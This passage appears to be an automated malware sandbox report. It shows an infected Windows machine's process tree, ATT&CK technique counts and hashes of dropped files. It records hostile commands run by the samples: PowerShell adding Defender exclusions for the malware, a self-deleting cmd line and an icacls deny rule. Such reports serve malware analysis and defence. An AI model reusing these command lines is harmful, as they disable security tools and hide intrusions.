                                                                              • Checks processor information in registry
                                                                              • Modifies data under HKEY_USERS
                                                                              • Modifies registry class
                                                                              PID:2888
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                              2⤵
                                                                              • Drops file in System32 directory
                                                                              • Checks processor information in registry
                                                                              • Modifies data under HKEY_USERS
                                                                              • Modifies registry class
                                                                              PID:4448
                                                                          • c:\windows\system32\svchost.exe
                                                                            c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                                                                            1⤵
                                                                              PID:1368
                                                                            • c:\windows\system32\svchost.exe
                                                                              c:\windows\system32\svchost.exe -k netsvcs -s Themes
                                                                              1⤵
                                                                                PID:1164
                                                                              • c:\windows\system32\svchost.exe
                                                                                c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                                                                                1⤵
                                                                                  PID:1112
                                                                                • c:\windows\system32\svchost.exe
                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                                                                                  1⤵
                                                                                  • Drops file in System32 directory
                                                                                  PID:344
                                                                                  • C:\Users\Admin\AppData\Roaming\hthcfgr
                                                                                    C:\Users\Admin\AppData\Roaming\hthcfgr
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    • Checks SCSI registry key(s)
                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                    PID:5464
                                                                                  • C:\Users\Admin\AppData\Roaming\bthcfgr
                                                                                    C:\Users\Admin\AppData\Roaming\bthcfgr
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of SetThreadContext
                                                                                    PID:5364
                                                                                    • C:\Users\Admin\AppData\Roaming\bthcfgr
                                                                                      C:\Users\Admin\AppData\Roaming\bthcfgr
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      • Checks SCSI registry key(s)
                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                      PID:6016
                                                                                • c:\windows\system32\svchost.exe
                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                                                  1⤵
                                                                                    PID:996
                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                    1⤵
                                                                                    • Drops file in Windows directory
                                                                                    • Modifies Internet Explorer settings
                                                                                    • Modifies registry class
                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                    PID:4388
                                                                                  • C:\Windows\system32\browser_broker.exe
                                                                                    C:\Windows\system32\browser_broker.exe -Embedding
                                                                                    1⤵
                                                                                      PID:5024
                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                      1⤵
                                                                                      • Modifies registry class
                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                      PID:4352
                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                      1⤵
                                                                                      • Modifies Internet Explorer settings
                                                                                      • Modifies registry class
                                                                                      PID:4692
                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                      1⤵
                                                                                      • Modifies registry class
                                                                                      PID:5780
                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                      1⤵
                                                                                      • Modifies registry class
                                                                                      PID:6000
                                                                                    • C:\Windows\system32\werfault.exe
                                                                                      werfault.exe /h /shared Global\1a2a28f390e349f78e6c0ed43af24cd8 /t 1296 /p 6000
                                                                                      1⤵
                                                                                        PID:4920
                                                                                      • C:\Users\Admin\AppData\Local\Temp\F151.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\F151.exe
                                                                                        1⤵
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                        PID:5096
                                                                                      • C:\Users\Admin\AppData\Local\Temp\F3E2.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\F3E2.exe
                                                                                        1⤵
                                                                                          PID:4316
                                                                                        • C:\Users\Admin\AppData\Local\Temp\808.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\808.exe
                                                                                          1⤵
                                                                                          • Executes dropped EXE
                                                                                          • Loads dropped DLL
                                                                                          PID:6056
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\808.exe"
                                                                                            2⤵
                                                                                              PID:5900
                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                timeout /T 10 /NOBREAK
                                                                                                3⤵
                                                                                                • Delays execution with timeout.exe
                                                                                                PID:4252
                                                                                          • C:\Windows\system32\backgroundTaskHost.exe
                                                                                            "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mca
                                                                                            1⤵
                                                                                              PID:1308
                                                                                            • C:\Users\Admin\AppData\Local\Temp\3032.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\3032.exe
                                                                                              1⤵
                                                                                              • Executes dropped EXE
                                                                                              • Suspicious use of SetThreadContext
                                                                                              PID:5652
                                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                2⤵
                                                                                                  PID:5836
                                                                                              • C:\Users\Admin\AppData\Local\Temp\365D.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\365D.exe
                                                                                                1⤵
                                                                                                • Executes dropped EXE
                                                                                                • Loads dropped DLL
                                                                                                PID:5388
                                                                                              • C:\Users\Admin\AppData\Local\Temp\3D34.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\3D34.exe
                                                                                                1⤵
                                                                                                • Executes dropped EXE
                                                                                                • Drops startup file
                                                                                                • Loads dropped DLL
                                                                                                • NTFS ADS
                                                                                                PID:4528
                                                                                              • C:\Users\Admin\AppData\Local\Temp\4544.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\4544.exe
                                                                                                1⤵
                                                                                                • Executes dropped EXE
                                                                                                • Suspicious use of SetThreadContext
                                                                                                PID:5996
                                                                                                • C:\Users\Admin\AppData\Local\Temp\4544.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\4544.exe
                                                                                                  2⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Adds Run key to start application
                                                                                                  PID:3000
                                                                                              • C:\Users\Admin\AppData\Local\Temp\4DD0.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\4DD0.exe
                                                                                                1⤵
                                                                                                • Executes dropped EXE
                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                PID:4316
                                                                                              • C:\Users\Admin\AppData\Local\Temp\5591.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\5591.exe
                                                                                                1⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:4240
                                                                                              • C:\Users\Admin\AppData\Local\Temp\5BBD.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\5BBD.exe
                                                                                                1⤵
                                                                                                • Executes dropped EXE
                                                                                                • Windows security modification
                                                                                                • Suspicious use of SetThreadContext
                                                                                                PID:300
                                                                                                • C:\Users\Admin\AppData\Local\Temp\a15d3e2e-a307-4e23-b942-ede0a12511b0\AdvancedRun.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\a15d3e2e-a307-4e23-b942-ede0a12511b0\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\a15d3e2e-a307-4e23-b942-ede0a12511b0\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
                                                                                                  2⤵
                                                                                                    PID:4036
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\a15d3e2e-a307-4e23-b942-ede0a12511b0\AdvancedRun.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\a15d3e2e-a307-4e23-b942-ede0a12511b0\AdvancedRun.exe" /SpecialRun 4101d8 4036
                                                                                                      3⤵
                                                                                                        PID:4332
                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\5BBD.exe" -Force
                                                                                                      2⤵
                                                                                                        PID:3792
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\5BBD.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\5BBD.exe"
                                                                                                        2⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:3160
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\62F1.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\62F1.exe
                                                                                                      1⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Windows security modification
                                                                                                      • Suspicious use of SetThreadContext
                                                                                                      • Modifies system certificate store
                                                                                                      PID:5944
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\1eb85a73-5313-4976-8abf-1d02a998284e\AdvancedRun.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\1eb85a73-5313-4976-8abf-1d02a998284e\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\1eb85a73-5313-4976-8abf-1d02a998284e\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
                                                                                                        2⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:1436
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1eb85a73-5313-4976-8abf-1d02a998284e\AdvancedRun.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\1eb85a73-5313-4976-8abf-1d02a998284e\AdvancedRun.exe" /SpecialRun 4101d8 1436
                                                                                                          3⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:3860
                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\62F1.exe" -Force
                                                                                                        2⤵
                                                                                                          PID:3084
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\62F1.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\62F1.exe"
                                                                                                          2⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:4112
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\62F1.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\62F1.exe"
                                                                                                          2⤵
                                                                                                            PID:4780
                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                          1⤵
                                                                                                            PID:4328
                                                                                                          • C:\Windows\explorer.exe
                                                                                                            C:\Windows\explorer.exe
                                                                                                            1⤵
                                                                                                              PID:4548
                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                              1⤵
                                                                                                                PID:4556
                                                                                                              • C:\Windows\explorer.exe
                                                                                                                C:\Windows\explorer.exe
                                                                                                                1⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:4460
                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                1⤵
                                                                                                                  PID:2284
                                                                                                                • C:\Windows\explorer.exe
                                                                                                                  C:\Windows\explorer.exe
                                                                                                                  1⤵
                                                                                                                    PID:5932
                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                    1⤵
                                                                                                                      PID:4564
                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                      C:\Windows\explorer.exe
                                                                                                                      1⤵
                                                                                                                        PID:4440
                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                                        1⤵
                                                                                                                          PID:5176
                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                          C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                          1⤵
                                                                                                                            PID:2424
                                                                                                                          • \??\c:\windows\system32\svchost.exe
                                                                                                                            c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                            1⤵
                                                                                                                              PID:5824
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\C308.exe
                                                                                                                              C:\Users\Admin\AppData\Local\Temp\C308.exe
                                                                                                                              1⤵
                                                                                                                              • Adds Run key to start application
                                                                                                                              PID:4252
                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                icacls "C:\Users\Admin\AppData\Local\37e9f5af-1a2c-4c5e-a07c-48158019d20a" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                                                                                2⤵
                                                                                                                                • Modifies file permissions
                                                                                                                                PID:6136
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\C308.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\C308.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                2⤵
                                                                                                                                  PID:4620
                                                                                                                                  • C:\Users\Admin\AppData\Local\e9187633-2cf4-4b60-94a8-aaed9fe5aae5\updatewin1.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\e9187633-2cf4-4b60-94a8-aaed9fe5aae5\updatewin1.exe"
                                                                                                                                    3⤵
                                                                                                                                      PID:4284
                                                                                                                                    • C:\Users\Admin\AppData\Local\e9187633-2cf4-4b60-94a8-aaed9fe5aae5\updatewin2.exe
                                                                                                                                      "C:\Users\Admin\AppData\Local\e9187633-2cf4-4b60-94a8-aaed9fe5aae5\updatewin2.exe"
                                                                                                                                      3⤵
                                                                                                                                        PID:6072
                                                                                                                                      • C:\Users\Admin\AppData\Local\e9187633-2cf4-4b60-94a8-aaed9fe5aae5\5.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\e9187633-2cf4-4b60-94a8-aaed9fe5aae5\5.exe"
                                                                                                                                        3⤵
                                                                                                                                        • Checks processor information in registry
                                                                                                                                        PID:2888
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\D3D2.exe
                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\D3D2.exe
                                                                                                                                    1⤵
                                                                                                                                      PID:2892

                                                                                                                                    Network

                                                                                                                                    MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                    Persistence

                                                                                                                                    Registry Run Keys / Startup Folder

                                                                                                                                    1
                                                                                                                                    T1060

                                                                                                                                    BITS Jobs

                                                                                                                                    1
                                                                                                                                    T1197

                                                                                                                                    Defense Evasion

                                                                                                                                    Disabling Security Tools

                                                                                                                                    3
                                                                                                                                    T1089

                                                                                                                                    Modify Registry

                                                                                                                                    6
                                                                                                                                    T1112

                                                                                                                                    File Permissions Modification

                                                                                                                                    1
                                                                                                                                    T1222

                                                                                                                                    BITS Jobs

                                                                                                                                    1
                                                                                                                                    T1197

                                                                                                                                    Install Root Certificate

                                                                                                                                    1
                                                                                                                                    T1130

                                                                                                                                    Credential Access

                                                                                                                                    Credentials in Files

                                                                                                                                    5
                                                                                                                                    T1081

                                                                                                                                    Discovery

                                                                                                                                    Software Discovery

                                                                                                                                    1
                                                                                                                                    T1518

                                                                                                                                    Query Registry

                                                                                                                                    4
                                                                                                                                    T1012

                                                                                                                                    System Information Discovery

                                                                                                                                    5
                                                                                                                                    T1082

                                                                                                                                    Security Software Discovery

                                                                                                                                    1
                                                                                                                                    T1063

                                                                                                                                    Peripheral Device Discovery

                                                                                                                                    1
                                                                                                                                    T1120

                                                                                                                                    Remote System Discovery

                                                                                                                                    1
                                                                                                                                    T1018

                                                                                                                                    Collection

                                                                                                                                    Data from Local System

                                                                                                                                    5
                                                                                                                                    T1005

                                                                                                                                    Command and Control

                                                                                                                                    Web Service

                                                                                                                                    1
                                                                                                                                    T1102

                                                                                                                                    Replay Monitor

                                                                                                                                    Loading Replay Monitor...

                                                                                                                                    Downloads

                                                                                                                                    • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                      MD5

                                                                                                                                      7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                                      SHA1

                                                                                                                                      804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                                      SHA256

                                                                                                                                      bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                                      SHA512

                                                                                                                                      49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                                    • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                      MD5

                                                                                                                                      7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                                      SHA1

                                                                                                                                      804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                                      SHA256

                                                                                                                                      bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                                      SHA512

                                                                                                                                      49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                                    • C:\Program Files\Windows Portable Devices\XRYXYIYWJE\ultramediaburner.exe
                                                                                                                                      MD5

                                                                                                                                      6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                                      SHA1

                                                                                                                                      938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                                      SHA256

                                                                                                                                      b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                                      SHA512

                                                                                                                                      a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                                                    • C:\Program Files\Windows Portable Devices\XRYXYIYWJE\ultramediaburner.exe
                                                                                                                                      MD5

                                                                                                                                      6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                                      SHA1

                                                                                                                                      938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                                      SHA256

                                                                                                                                      b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                                      SHA512

                                                                                                                                      a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                                                    • C:\Program Files\install.dat
                                                                                                                                      MD5

                                                                                                                                      806c3221a013fec9530762750556c332

                                                                                                                                      SHA1

                                                                                                                                      36475bcfd0a18555d7c0413d007bbe80f7d321b5

                                                                                                                                      SHA256

                                                                                                                                      9bcecc5fb84d21db673c81a7ed1d10b28686b8261f79136f748ab7bbad7752f7

                                                                                                                                      SHA512

                                                                                                                                      56bbaafe7b0883f4e5dcff00ae69339a3b81ac8ba90b304aeab3e4e7e7523b568fd9b269241fc38a39f74894084f1f252a91c22b79cc0a16f9e135859a13145e

                                                                                                                                    • C:\Program Files\install.dat
                                                                                                                                      MD5

                                                                                                                                      bef5c483c6eba257020201190666e28d

                                                                                                                                      SHA1

                                                                                                                                      e7f5cda41f731eea23bc45c0a6c06ad91f1d7df8

                                                                                                                                      SHA256

                                                                                                                                      d42b23175385ccc042ffebd37cc0f25847c790fb6f98bad0cd024f70f85b3fce

                                                                                                                                      SHA512

                                                                                                                                      302bca91e431e388f7bcff837ab6b7be23a9a38026410589e4ae3c86be057039117897429b5664eccee8a6871904f8e44629acf7d837cece8c701fb6915fdf90

                                                                                                                                    • C:\Program Files\install.dll
                                                                                                                                      MD5

                                                                                                                                      fe60ddbeab6e50c4f490ddf56b52057c

                                                                                                                                      SHA1

                                                                                                                                      6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                                                                                      SHA256

                                                                                                                                      9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                                                                                                      SHA512

                                                                                                                                      0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                                                                                                    • C:\Program Files\install.dll
                                                                                                                                      MD5

                                                                                                                                      c6a2e4e23319dec9d56f8029ef834e83

                                                                                                                                      SHA1

                                                                                                                                      299e80473cbe56b596a2d4d38aea0aab46826167

                                                                                                                                      SHA256

                                                                                                                                      6ae4bd10f8bc7f3e5856c7f3571d165787f48d23f95ccfa823a5dab74f7fd554

                                                                                                                                      SHA512

                                                                                                                                      2a30529c2254ff481ab099032829d1b533d8bb6fca6a766d04e3febd6dc87ba34852eb7354ffc8d0ed7f584b5bff587e2b549c4f4c9150e98a2ff6a0f751438a

                                                                                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                                                      MD5

                                                                                                                                      3dc75c8ba7dcdc712767df3611586f1b

                                                                                                                                      SHA1

                                                                                                                                      5533aa220568dcad942d24c661ca74b060738d31

                                                                                                                                      SHA256

                                                                                                                                      a646721e8d0f7dc26db96866769f2c510a578d881e1d39f89bd9fc747f05bc5d

                                                                                                                                      SHA512

                                                                                                                                      d639b5768098b1ed5380c3d2ba8dfddaecde5b23b620748edaac9f93ccbf8d91173c18d1baa54c460ebc10ebb90cd988372167a984cfae74a01767b025698067

                                                                                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\5EE9003E3DC4134E8CF26DC55FD926FA
                                                                                                                                      MD5

                                                                                                                                      fb0f559e615d3878e56eb20ab916f196

                                                                                                                                      SHA1

                                                                                                                                      08f3211cb3350f05167ded1c39c9cb63fa1b7a51

                                                                                                                                      SHA256

                                                                                                                                      529b6de1cfe810079c154735d4ac4889099051aa46d62bd83afa7ba28ec8618f

                                                                                                                                      SHA512

                                                                                                                                      6f5efb98c09998f2fb498315fc641ecca400e4c990d9da4ee76bf88a6010ff3e178655d58e46f74c1f07589984eb846a5b2fcb981f224fe86904df028b057b3e

                                                                                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                                                      MD5

                                                                                                                                      24df47c0abca3f68afdcab7c519d7c39

                                                                                                                                      SHA1

                                                                                                                                      b175a5c0b829e4ae2a8ec10c0f07de9b17667eb9

                                                                                                                                      SHA256

                                                                                                                                      dbb2bc09bd21f4cde8453ebe73c8750c694ea9b4070d7bf4a42cbf14958088d0

                                                                                                                                      SHA512

                                                                                                                                      28ad5e8a6317c8dc16f2918289503cdb5f5cad18248d77f8aa180fcb3ff8ac582889941cc17ae95749d8f3629c87a867f4ae2d2da3af3c7034f252ae53581b6e

                                                                                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                                                      MD5

                                                                                                                                      010959275bf9c154b4a97c2456acc78e

                                                                                                                                      SHA1

                                                                                                                                      cf0c39e027e5e4d0d05663305a9e3c7bf444d56b

                                                                                                                                      SHA256

                                                                                                                                      037fe72879d9d8f38202a6a1d58221866628f44b77bc06d27713246c77c0ea53

                                                                                                                                      SHA512

                                                                                                                                      8bcc83eced8c2faa699f7e0705d15dd62859f2efdad7b75b8adc65bc01ea0bb498f3aaaff2b0780f518cfb72528b2db71f6f8a6970177b274e475d9cdb988fb1

                                                                                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5EE9003E3DC4134E8CF26DC55FD926FA
                                                                                                                                      MD5

                                                                                                                                      eb795db3fdca4d0b2b779db2e3d6a013

                                                                                                                                      SHA1

                                                                                                                                      d19ab2035894af7741edf7f99ff81642ad2126f2

                                                                                                                                      SHA256

                                                                                                                                      88213f73caa32700c02550463d7dfb4dd7e536acb1e9ad62de2f81babdb7ef41

                                                                                                                                      SHA512

                                                                                                                                      9e5ae3a5d416549dffc9d1a1095b88e4a71273e8fb086bbb31523407a40ee94c16d454b91c10bc40abc9200359c37f200de0b80d581f34a087ab31398a76e1d3

                                                                                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                                                      MD5

                                                                                                                                      fa797c863a499e83d4830b4eba158e92

                                                                                                                                      SHA1

                                                                                                                                      039794a6c7e0b38c30200380f9f2a959bdbfc22f

                                                                                                                                      SHA256

                                                                                                                                      42c4553b1b5e899e7f1d01e179271abf42329873e6b3902ad537168a298af727

                                                                                                                                      SHA512

                                                                                                                                      b43c89982a4cdf26f2fb1dd38170a06a0eff27f0c3ba2e290a6b4a41e271ef566708e2bae7b406b5b6ed09efe05482bb18066425c7931f074d8aeae8a52bcf96

                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\035he0sq.khg\HookSetp.exe
                                                                                                                                      MD5

                                                                                                                                      83cd7d8344a477c804eb5e59c6ffb6db

                                                                                                                                      SHA1

                                                                                                                                      2edd6d2ba711db041d13a3a1f21e302b3c67992d

                                                                                                                                      SHA256

                                                                                                                                      b3299412111f4d2343850f0876316361ea9c35c30f6723150871f7015b55a02b

                                                                                                                                      SHA512

                                                                                                                                      8a4b8428d6cf6d3c2d097221424c574aba8644328ff61a46e886130457e0ed6cbb6d4de5f6348dc7d23d114b9ba6731c170537390486faf0ec40f21a44d4729f

                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\035he0sq.khg\HookSetp.exe
                                                                                                                                      MD5

                                                                                                                                      83cd7d8344a477c804eb5e59c6ffb6db

                                                                                                                                      SHA1

                                                                                                                                      2edd6d2ba711db041d13a3a1f21e302b3c67992d

                                                                                                                                      SHA256

                                                                                                                                      b3299412111f4d2343850f0876316361ea9c35c30f6723150871f7015b55a02b

                                                                                                                                      SHA512

                                                                                                                                      8a4b8428d6cf6d3c2d097221424c574aba8644328ff61a46e886130457e0ed6cbb6d4de5f6348dc7d23d114b9ba6731c170537390486faf0ec40f21a44d4729f

                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1265214349.exe
                                                                                                                                      MD5

                                                                                                                                      cca6e302974f8ad2cf237cbb402f7db8

                                                                                                                                      SHA1

                                                                                                                                      82483651f9c152a2ccf0a7f6a348c14daf73ccfc

                                                                                                                                      SHA256

                                                                                                                                      12da3023f88f28c58bfa10a19cf70481e263bed0ae9bd393369e6ed9b7971827

                                                                                                                                      SHA512

                                                                                                                                      cad0b4afd348085070f4a786bdcd62a5d01ca3413f07315956c09489b3ca92e09a893bc1960d25c9a650eeb3d0c4395a1b47d0562b359285794d9e4c0929ae87

                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1708353945.exe
                                                                                                                                      MD5

                                                                                                                                      d51901e3386120269c6b08fcaa3816e7

                                                                                                                                      SHA1

                                                                                                                                      6b0a36ce8cb5390d4d53800e4bf5281fb0eb5d7e

                                                                                                                                      SHA256

                                                                                                                                      afd25aff257a6b31a2377b9633a0f4227da3112976c749c34858d85436d0af5a

                                                                                                                                      SHA512

                                                                                                                                      5639773bca6fdeefe91ca58776758c1abd2a8a67824365dd0140800ddaa3935dcd4568eeebe8163f564e8d3754bce65b339163a230bd7d17b5c6e16eb5c345f5

                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1708353945.exe
                                                                                                                                      MD5

                                                                                                                                      d51901e3386120269c6b08fcaa3816e7

                                                                                                                                      SHA1

                                                                                                                                      6b0a36ce8cb5390d4d53800e4bf5281fb0eb5d7e

                                                                                                                                      SHA256

                                                                                                                                      afd25aff257a6b31a2377b9633a0f4227da3112976c749c34858d85436d0af5a

                                                                                                                                      SHA512

                                                                                                                                      5639773bca6fdeefe91ca58776758c1abd2a8a67824365dd0140800ddaa3935dcd4568eeebe8163f564e8d3754bce65b339163a230bd7d17b5c6e16eb5c345f5

                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\19-2e6ee-4ef-4e784-ce09fe95411c7\Goshavozhagy.exe
                                                                                                                                      MD5

